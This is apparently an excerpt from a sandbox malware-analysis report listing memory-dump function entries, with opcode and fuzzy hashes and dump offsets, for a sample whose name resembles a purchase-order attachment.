                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7b5b9b4df81cc59a23db55d983bb13a634c329b5f35b0750811204e565a99257
                                                          • Instruction ID: 0159f1816687a8d121f7b3fee2935e0a080b43569eef83a67a4495ce6be51255
                                                          • Opcode Fuzzy Hash: 7b5b9b4df81cc59a23db55d983bb13a634c329b5f35b0750811204e565a99257
                                                          • Instruction Fuzzy Hash: 2B01693AA00208CFDB08DFA8F480ADCB373FB84326F24C166D10597619D7359956DF61
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e9da0d5f75800fb0067092b165ec19d513773eb2e5a3438c97592b63825c829d
                                                          • Instruction ID: 23cdedb22ae7d10ca07456d2de1ff00d16a49c49108c5e79dac881bde824e32a
                                                          • Opcode Fuzzy Hash: e9da0d5f75800fb0067092b165ec19d513773eb2e5a3438c97592b63825c829d
                                                          • Instruction Fuzzy Hash: EDF0BE3AB0864CCFDB14DFA8F8800DCB7B2FB85366B248263C409A3219DB3145168B21
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 977c9688c99375af5415355a1ca231a9aff503afd1f417d3a25a45860b0b14ca
                                                          • Instruction ID: 6157473f905a66f496d86e9e8e6f585f2b9d30f957158ba72191fe122871c308
                                                          • Opcode Fuzzy Hash: 977c9688c99375af5415355a1ca231a9aff503afd1f417d3a25a45860b0b14ca
                                                          • Instruction Fuzzy Hash: AF01193AF04248CFDB14DFA9F480ADDB3B2FB88315F24C166D508A3619D734A9568F51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3ded16f20db44187f9932e007f52e954d41b6be05c00b82be5cfdc3a5706ce2b
                                                          • Instruction ID: 4620be446c626b198b04b2e7fc1cca162d191ddfbf96df758c9372f49bcc8269
                                                          • Opcode Fuzzy Hash: 3ded16f20db44187f9932e007f52e954d41b6be05c00b82be5cfdc3a5706ce2b
                                                          • Instruction Fuzzy Hash: A5018C36B04248CFDB18DFA8F4806ECB3B2EB8431AF24C176C10997619D7359995CB50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0e438fe3af70e1654d6663ee7517080e7b64d87129c098204b40c2f46fdb8f86
                                                          • Instruction ID: b208d43fefc962d357d1273ffebde63e28445233c69316d3e577840b77f0fdc6
                                                          • Opcode Fuzzy Hash: 0e438fe3af70e1654d6663ee7517080e7b64d87129c098204b40c2f46fdb8f86
                                                          • Instruction Fuzzy Hash: 00F024B290D3807FCB2ADB60D8EA65A7F73D7E3254B89459DE04546796D22C9803C712
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c2da9777226b3a40475cd92c45834ddf72c74e4f5f740ba479e4ca816e4eeffd
                                                          • Instruction ID: c6b58dd6cf1af16bbe2fcf0eddba3bf2474ec4418034d18e77fed54b6438909f
                                                          • Opcode Fuzzy Hash: c2da9777226b3a40475cd92c45834ddf72c74e4f5f740ba479e4ca816e4eeffd
                                                          • Instruction Fuzzy Hash: 85F05C363052112BDB151618A41473F3E9F5FC1911F1580AFE505C73C5DE68EC0183D3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ccc80721bbcdb28ca70c81e30628437a5fea8899736953f560709a49f6f9332b
                                                          • Instruction ID: 07921f0293d1dacacaead049866b7bae13e26c67d0840bc5c520b6fa4fd0ead9
                                                          • Opcode Fuzzy Hash: ccc80721bbcdb28ca70c81e30628437a5fea8899736953f560709a49f6f9332b
                                                          • Instruction Fuzzy Hash: 5DF0BE363006009F87049F69EC88E8A7BBDFFD932170180AAF918E7360DE70D8048B90
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 14e1f898c3db94d803fc66d0b977a30acc3876f323dea10030dd1657700a0fca
                                                          • Instruction ID: 6ae760721ec6521e23aa058c200d97cc795ca53af8c8d19159828129fc82b74f
                                                          • Opcode Fuzzy Hash: 14e1f898c3db94d803fc66d0b977a30acc3876f323dea10030dd1657700a0fca
                                                          • Instruction Fuzzy Hash: 45F0373AB04248CFDB14DFA8F480ADCB3B2FB88326F28C166D50893619D73099568B10
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4547251749f4a4992a042dbb4606a6fe486e1ad23755f89c835a3e3f4a9d15e9
                                                          • Instruction ID: ea335050796fd5c687ddfc596815cd420a4879e140fe850e222fefdb842b5f91
                                                          • Opcode Fuzzy Hash: 4547251749f4a4992a042dbb4606a6fe486e1ad23755f89c835a3e3f4a9d15e9
                                                          • Instruction Fuzzy Hash: 78F037317043148FDF295674982576537AAAB85222F1544FDE509CF280DF76EC418792
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748974376.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e30000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3bc7b686f094abd8d3bfecb4f6ea69c7b73a0f12556bc94ff5ad0c13d79b4442
                                                          • Instruction ID: 50ac01d7cb10197b232c2d94c03d476962dca3253bc27ffd7b026319676d7e39
                                                          • Opcode Fuzzy Hash: 3bc7b686f094abd8d3bfecb4f6ea69c7b73a0f12556bc94ff5ad0c13d79b4442
                                                          • Instruction Fuzzy Hash: 17112334901258CFDB68DF18D889AE9B7B2EB48340F1080D4E049A3B84CB34AFC9CF41
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3c9864bd9ac468482b6ca9920a803c9ba36939ea566f2ff714b09c4dd462e533
                                                          • Instruction ID: 7e81feb9127e8e6f8cb81b24174492829351825104d437022046037c63e6863a
                                                          • Opcode Fuzzy Hash: 3c9864bd9ac468482b6ca9920a803c9ba36939ea566f2ff714b09c4dd462e533
                                                          • Instruction Fuzzy Hash: 98F0493AA04248CFDB04DF98F4847DDF3B2FB88329F28C166C108A7659D7359959DB60
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 016269b710bed369d5610073eaf1834ec3cdc0f5fc834d0016c87e1b196a6a3c
                                                          • Instruction ID: aa140be719c23f8cf30be4416ec97e74ffa390ff217202cce665476d384b71df
                                                          • Opcode Fuzzy Hash: 016269b710bed369d5610073eaf1834ec3cdc0f5fc834d0016c87e1b196a6a3c
                                                          • Instruction Fuzzy Hash: 76F0493AA04248CFDB14DFA8F4846ECB3B2FB84316F28C176D51993629D7309959DF10
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d67039b3bf0c4db35fb904e851ab7e3ee6cd2c512190d8c9d4cac63f6ca0e5b2
                                                          • Instruction ID: 5fc09828dd4248cd15a9e5a8e32de529dcdff323586e8483a4fe109e00aee916
                                                          • Opcode Fuzzy Hash: d67039b3bf0c4db35fb904e851ab7e3ee6cd2c512190d8c9d4cac63f6ca0e5b2
                                                          • Instruction Fuzzy Hash: 69F09A36B04608CBDB24DF58F4403EDF3B2EB8432AF24C123C44993609D73098569F61
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3b43c78ad787b554a13d95c416b3c1dd6bcccaa5c5d1560b75c070309d46fa42
                                                          • Instruction ID: 31f8674071d096a3f095c878eaec5da9281129ea0c2a8432751ae04ccc249ec3
                                                          • Opcode Fuzzy Hash: 3b43c78ad787b554a13d95c416b3c1dd6bcccaa5c5d1560b75c070309d46fa42
                                                          • Instruction Fuzzy Hash: CFF09070A00648CFEB04DE95E445B6677BBE785300F648034D405AB24ED7B8AC44CA75
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a3227262baea6a2cdf481b82f66258f72673c30e650e2a0f34317a180a3c377e
                                                          • Instruction ID: 58aeed52247aeb2272471391d0eb1279117c500160a815aa76e204149e99f43e
                                                          • Opcode Fuzzy Hash: a3227262baea6a2cdf481b82f66258f72673c30e650e2a0f34317a180a3c377e
                                                          • Instruction Fuzzy Hash: C4F01D36F04248CBCB14DFA9F4801EDF7B2EBC5325F24C066C10A93659DA3555169B51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8943618b24c93d6290a58fc308941275904e2662de3a62dcac466639b4d50d04
                                                          • Instruction ID: 3b5bfe0e099c58b2a5a5eec2dc859b216c3d08ac56fce997a20170d55e450493
                                                          • Opcode Fuzzy Hash: 8943618b24c93d6290a58fc308941275904e2662de3a62dcac466639b4d50d04
                                                          • Instruction Fuzzy Hash: 0FF0A07310A3046FE3064FA5ECC77A87FB1DB82215F5A80EA9040C6B13D12AE4278212
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a29166ef2da089fc0cacd177110b61454dfd7ee200b0b2e83472dc3a66e3f2f9
                                                          • Instruction ID: 56617b8ab5332ab091ebb641afdaa27008a177242133a9bd876bebe5f7976fae
                                                          • Opcode Fuzzy Hash: a29166ef2da089fc0cacd177110b61454dfd7ee200b0b2e83472dc3a66e3f2f9
                                                          • Instruction Fuzzy Hash: F9F01D75908208EFCB45DFA8C851BADBBF8EB48200F04C49AA859D2241DA399A52DF50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 826a5f9580559e21f3e7902151dcbf0e3b48a84ea6a6bb073b3d34fc84afcd19
                                                          • Instruction ID: 27fc145b03a7eb58061c7614fecfa393a3d7303296237bb7147f9e9676728010
                                                          • Opcode Fuzzy Hash: 826a5f9580559e21f3e7902151dcbf0e3b48a84ea6a6bb073b3d34fc84afcd19
                                                          • Instruction Fuzzy Hash: 19F03A71D05208AFD701EBB9D449BACBBF8EB49210F108996D845A3352E6759E50CF51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1bd4b3c953b5f651b1e0fce50287eb9d8979a03564b9ccd3993557e5e83eac49
                                                          • Instruction ID: e29b91aaac76f3a63bfcdb99e548e2b6eaf02ee9b88cb05f7437ec51960405ec
                                                          • Opcode Fuzzy Hash: 1bd4b3c953b5f651b1e0fce50287eb9d8979a03564b9ccd3993557e5e83eac49
                                                          • Instruction Fuzzy Hash: F6F082B1A8D244DFCB0DCA50D8C93BEBFB6EF823A4F1894C6A80697255DE74B505CE11
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a35a9138b960b850c5e8b44a1c3dafbb7a426972d6994d9f16572641e366416c
                                                          • Instruction ID: 6b447d89bbc34695483d09029d9b6bba67878a00c8ec300cba81116c331f51c6
                                                          • Opcode Fuzzy Hash: a35a9138b960b850c5e8b44a1c3dafbb7a426972d6994d9f16572641e366416c
                                                          • Instruction Fuzzy Hash: F3F0673AB04208CFDB04DF99F4806EDF3B2FB84326F24C162C40993609DB31995A8F50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 98454101e70cb9bed0e62838ff90a9c0b31894b85250a111f3fbf998165d2a3a
                                                          • Instruction ID: 274e3eeeb2058141ec19573fd41ea8cd7101cba452406205af35dcc37f7febf8
                                                          • Opcode Fuzzy Hash: 98454101e70cb9bed0e62838ff90a9c0b31894b85250a111f3fbf998165d2a3a
                                                          • Instruction Fuzzy Hash: B7F05E36B04648CBDB24DFA8F4805EDF3B2FB84325F24C563C51993619E730951A9F61
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c39c248ef33ccbe5f8f16e8d9d55674b3c0753e228b1c5b7c3722e5fc82377f6
                                                          • Instruction ID: 695ae48149e394b44d27811366174517559fb537e5f43c905b7898f26bec0155
                                                          • Opcode Fuzzy Hash: c39c248ef33ccbe5f8f16e8d9d55674b3c0753e228b1c5b7c3722e5fc82377f6
                                                          • Instruction Fuzzy Hash: 2EF03A35310200DFC7049B29E454E3A77AAFFC8721B1441A9FA468B3B0CA31EC42CB90
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 816287d61b5c7de3e6d5bd282af1255584e08dc282891e9d0965cd2606ad4772
                                                          • Instruction ID: 3766ed4f263bb04a72ac2b4dc5bc711218b1c83b1a57d957110c1a60b8382bca
                                                          • Opcode Fuzzy Hash: 816287d61b5c7de3e6d5bd282af1255584e08dc282891e9d0965cd2606ad4772
                                                          • Instruction Fuzzy Hash: 8CF017B5D05208EFCB40DFA8D545AADBBF4FB08204F1090EAE808A3351E6359E01CF81
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748918837.0000000005D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: true
                                                          • Associated: 00000000.00000002.1748768765.0000000005D00000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5d00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 95ac3d226b9554b794b09dbcb87eac56a25bec5ed575e83a5a9b7514670ce51e
                                                          • Instruction ID: 0bd4443d48a5d9abb7257947da3c94dace2e82ff510a13bed2e2ed21bf97c8a5
                                                          • Opcode Fuzzy Hash: 95ac3d226b9554b794b09dbcb87eac56a25bec5ed575e83a5a9b7514670ce51e
                                                          • Instruction Fuzzy Hash: 0EF0E731C0060AEBCF01EF99D8419EEBB75FF89320F00C51AE95827211D772A5A6DFA0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b4c44f8a98daddb66efc13c0e01f6a264f2e112adc657cb37093d2a2891e4ce5
                                                          • Instruction ID: adbacebcd39b849d11d2ebc8ea1c88c5629f1cf011bca44507503c45e92d949c
                                                          • Opcode Fuzzy Hash: b4c44f8a98daddb66efc13c0e01f6a264f2e112adc657cb37093d2a2891e4ce5
                                                          • Instruction Fuzzy Hash: 58F0A070D592449FC701DFB8D6547AD3FB0DB05215F2140EAC84597291DAB01A44CB51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748974376.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e30000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5e1ec79810ea4cc7f21f7712db4b64a80a821ada91927f85e94506f335228bca
                                                          • Instruction ID: 26cbe0768a3745fba5b7db089e8a5aadd78bf2950458419d76c8612207987e69
                                                          • Opcode Fuzzy Hash: 5e1ec79810ea4cc7f21f7712db4b64a80a821ada91927f85e94506f335228bca
                                                          • Instruction Fuzzy Hash: E3010874A05258CFDB64DF58C888AD9B7B5FB88314F0081D9D44DA3715EB749E80CF42
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c610591b4eddce524f0e0f00ba56113fff1ef3251962345728c040dfbaf90645
                                                          • Instruction ID: 1ccd002ac132469707599b7edf09027f47592c665ccf9c33ab162c4fb8e8cbb7
                                                          • Opcode Fuzzy Hash: c610591b4eddce524f0e0f00ba56113fff1ef3251962345728c040dfbaf90645
                                                          • Instruction Fuzzy Hash: CCF0E572A042408FEB10874DAC857E633B3B7A5326F6D81B6E10587691D7B448E38714
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3d1cbe1489e8d548863686882eaab9e8f77f3c5c0bfaf30a764adc0b874ab520
                                                          • Instruction ID: a43c7f5b4255c166e0ad8546ecc16c1c8aa0c23fe2135b4279d14aec8630d94c
                                                          • Opcode Fuzzy Hash: 3d1cbe1489e8d548863686882eaab9e8f77f3c5c0bfaf30a764adc0b874ab520
                                                          • Instruction Fuzzy Hash: E7F03034300311CBEB296A7088257293A6AAF86626F1584ADE5169F2D0DF76E8418782
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 042b122a89fc1cb583b023795b72a3ac6bc3397ebe58eb8dd327ca588dbee974
                                                          • Instruction ID: c9f20cbf342d1a0f5acaf8b0a5dc79244566f897669a3ae6199406e1a47a3e9a
                                                          • Opcode Fuzzy Hash: 042b122a89fc1cb583b023795b72a3ac6bc3397ebe58eb8dd327ca588dbee974
                                                          • Instruction Fuzzy Hash: 16F05470549188AFCB41CB98C910AADBFB5EB0A311F14C0DAE86C93252C6359F12DB51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 93ac8aff95e880b6da693417e4fe3f510482763a0a64b06bf4409eadb2c4d839
                                                          • Instruction ID: d859e96344fa5b456abe3bec28d2e932f77458259553165fea35de649af8ed48
                                                          • Opcode Fuzzy Hash: 93ac8aff95e880b6da693417e4fe3f510482763a0a64b06bf4409eadb2c4d839
                                                          • Instruction Fuzzy Hash: ADF0E5713043059BC7159A2AECC484BFFAADFD83107009A3EF10A8B266DE70AD45C7E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f9258fe8014d79581918ce9289260d03550c97f23e001caa31541c359c180cfa
                                                          • Instruction ID: f4d4b33e985d904bb10a87690e90d6125b6ab5bc92046e1467999c601eaac056
                                                          • Opcode Fuzzy Hash: f9258fe8014d79581918ce9289260d03550c97f23e001caa31541c359c180cfa
                                                          • Instruction Fuzzy Hash: B4E0682330F12107C322081C7C9462789AEEBC5B10B5404BFFC49CF340F544CC0143A2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b2e58b476db4bde632c6b56aed7f686f4f9fd5279f9904a8af79c20ed652b7a6
                                                          • Instruction ID: bfcc414c6afdfa11a39f171def63dc0bf001553698e32ce2017f294c89c3b4eb
                                                          • Opcode Fuzzy Hash: b2e58b476db4bde632c6b56aed7f686f4f9fd5279f9904a8af79c20ed652b7a6
                                                          • Instruction Fuzzy Hash: 14F05E71E04614AFCB19DFA4D4497DD7FB2EB85220F048096E406972D1DB741B86CB91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f6087343face0eda0860df71fc76e3bf927db75f7c62d20a8e28a8ac47d7d5f6
                                                          • Instruction ID: 801175747c5267cd084085d8fe8881339f5777b4b44d037819380bc619472457
                                                          • Opcode Fuzzy Hash: f6087343face0eda0860df71fc76e3bf927db75f7c62d20a8e28a8ac47d7d5f6
                                                          • Instruction Fuzzy Hash: 5C011670A11248CFEB58DF18D498B9DBBF1FB88354F148195E848A7354CB74AD81CF52
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 19e3b4f8720f4de3f6640a6a302fc28bb1d0d73da8451e0b3e23dd032ebaeec7
                                                          • Instruction ID: 47055ccbcfe660dc064bc4726c2ad0c6c8b4015a3318ae696274cf2cc6b156a9
                                                          • Opcode Fuzzy Hash: 19e3b4f8720f4de3f6640a6a302fc28bb1d0d73da8451e0b3e23dd032ebaeec7
